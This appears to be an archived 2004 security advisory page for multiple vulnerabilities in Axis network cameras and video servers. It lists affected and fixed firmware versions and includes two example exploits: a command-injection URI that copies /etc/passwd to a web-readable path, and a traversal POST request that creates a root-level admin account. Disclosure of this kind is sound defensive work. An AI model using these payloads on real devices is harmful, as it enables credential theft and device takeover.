exploits , vulnerabilities , articles , Axis Network Camera And Video Server Multiple Vulnerabilities

Title	Axis Network Camera And Video Server Multiple Vulnerabilities
Published	2004-08-23-12:00AM
Updated	2004-08-31-08:49PM
Class	Design Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	bashis <mcw@wcd.se> disclosed these vulnerabilities.
Vulnerable	Axis Communications StorPoint CD Axis Communications Serial Server 2490 Axis Communications Network DVR 2460 Axis Communications MPEG2 Video Server 250S Axis Communications 250S Video Server 3.0 3 Axis Communications 250S MPEG2 Video Server 3.10 Axis Communications 2490 Serial Server 2.11.3 Axis Communications 2460 Network DVR 3.11 Axis Communications 2460 Network DVR 3.10 Axis Communications 2420 Video Server 2.34 Axis Communications 2420 Video Server 2.32 Axis Communications 2420 Network Camera 2.41 Axis Communications 2420 Network Camera 2.40 Axis Communications 2420 Network Camera 2.34 Axis Communications 2420 Network Camera 2.33 Axis Communications 2420 Network Camera 2.32 Axis Communications 2420 Network Camera 2.31 Axis Communications 2420 Network Camera 2.30 Axis Communications 2420 Network Camera 2.12 Axis Communications 2411 Video Server 3.13 Axis Communications 2411 Video Server 3.12 Axis Communications 2411 Video Server 3.12 Axis Communications 2401 Video Server 3.13 Axis Communications 2401 Video Server 3.12 Axis Communications 2401 Blade Video Server 3.12 Axis Communications 2401 Video Server 3.12 Axis Communications 2401 Video Server 2.34 Axis Communications 2401 Video Server 2.33 Axis Communications 2401 Video Server 2.32 Axis Communications 2401 Video Server 2.31 Axis Communications 2401 Video Server 2.30 Axis Communications 2401 Video Server 2.20 Axis Communications 2401 Video Server 1.15 Axis Communications 2401 Video Server 1.0 1 Axis Communications 2400 Video Server 3.12 Axis Communications 2400 Video Server 3.11 Axis Communications 2400 Blade Video Server 3.12 Axis Communications 2400 Video Server 2.34 Axis Communications 2400 Video Server 2.33 Axis Communications 2400 Video Server 2.32 Axis Communications 2400 Video Server 2.31 Axis Communications 2400 Video Server 2.30 Axis Communications 2400 Video Server 2.20 Axis Communications 2400 Video Server 2.0 Axis Communications 2400 Video Server 1.15 Axis Communications 2400 Video Server 1.12 Axis Communications 2400 Video Server 1.11 Axis Communications 2400 Video Server 1.10 Axis Communications 2400 Video Server 1.0 2 Axis Communications 2400 Video Server 1.0 1 Axis Communications 230 MPEG2 Video Server 3.11 Axis Communications 2130 PTZ Network Camera 2.40 Axis Communications 2130 PTZ Network Camera 2.34 Axis Communications 2130 PTZ Network Camera 2.32 Axis Communications 2130 PTZ Network Camera 2.31 Axis Communications 2130 PTZ Network Camera 2.30 Axis Communications 2120 Network Camera 2.41 Axis Communications 2120 Network Camera 2.40 Axis Communications 2120 Network Camera 2.34 Axis Communications 2120 Network Camera 2.32 Axis Communications 2120 Network Camera 2.31 Axis Communications 2120 Network Camera 2.30 Axis Communications 2120 Network Camera 2.12 Axis Communications 2110 Network Camera 2.41 Axis Communications 2110 Network Camera 2.40 Axis Communications 2110 Network Camera 2.34 Axis Communications 2110 Network Camera 2.32 Axis Communications 2110 Network Camera 2.31 Axis Communications 2110 Network Camera 2.30 Axis Communications 2110 Network Camera 2.12 Axis Communications 2100 Network Camera 2.41 Axis Communications 2100 Network Camera 2.40 Axis Communications 2100 Network Camera 2.34 Axis Communications 2100 Network Camera 2.33 Axis Communications 2100 Network Camera 2.32 Axis Communications 2100 Network Camera 2.31 Axis Communications 2100 Network Camera 2.30 Axis Communications 2100 Network Camera 2.12
Not Vulnerable	Axis Communications 250S MPEG-2 Video Server 3.20 Axis Communications 2460 Digital Video Recorder 3.13 Axis Communications 2420 Network Camera 2.42 Axis Communications 2411 Video Server 3.13 Axis Communications 2401 Blade Video Server 3.13 Axis Communications 2401 Video Server 3.13 Axis Communications 2401 Video Server 2.34.1 Axis Communications 2400 Video Server 3.13 Axis Communications 2400 Blade Video Server 3.13 Axis Communications 2400 Video Server 2.34.1 Axis Communications 230 MPEG-2 Video Server 3.20 Axis Communications 2130 Network Camera 2.42 Axis Communications 2120 Network Camera 2.42 Axis Communications 2110 Network Camera 2.42 Axis Communications 2100 Network Camera 2.42
Code	Exploits are not required for these vulnerabilities. Examples have been provided: A URI sufficient to exploit the first vulnerability: http://www.example.com/axis-cgi/io/virtualinput.cgi?x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwdx60 Example contents of POST data sufficient to exploit the second vulnerability: POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0 Content-Length: 250 Pragma: no-cache conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Centreon Authentication Mechanism Security Bypass Vulnerability
2009-12-18 Family Connections Multiple Input Validation Vulnerabilities
2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability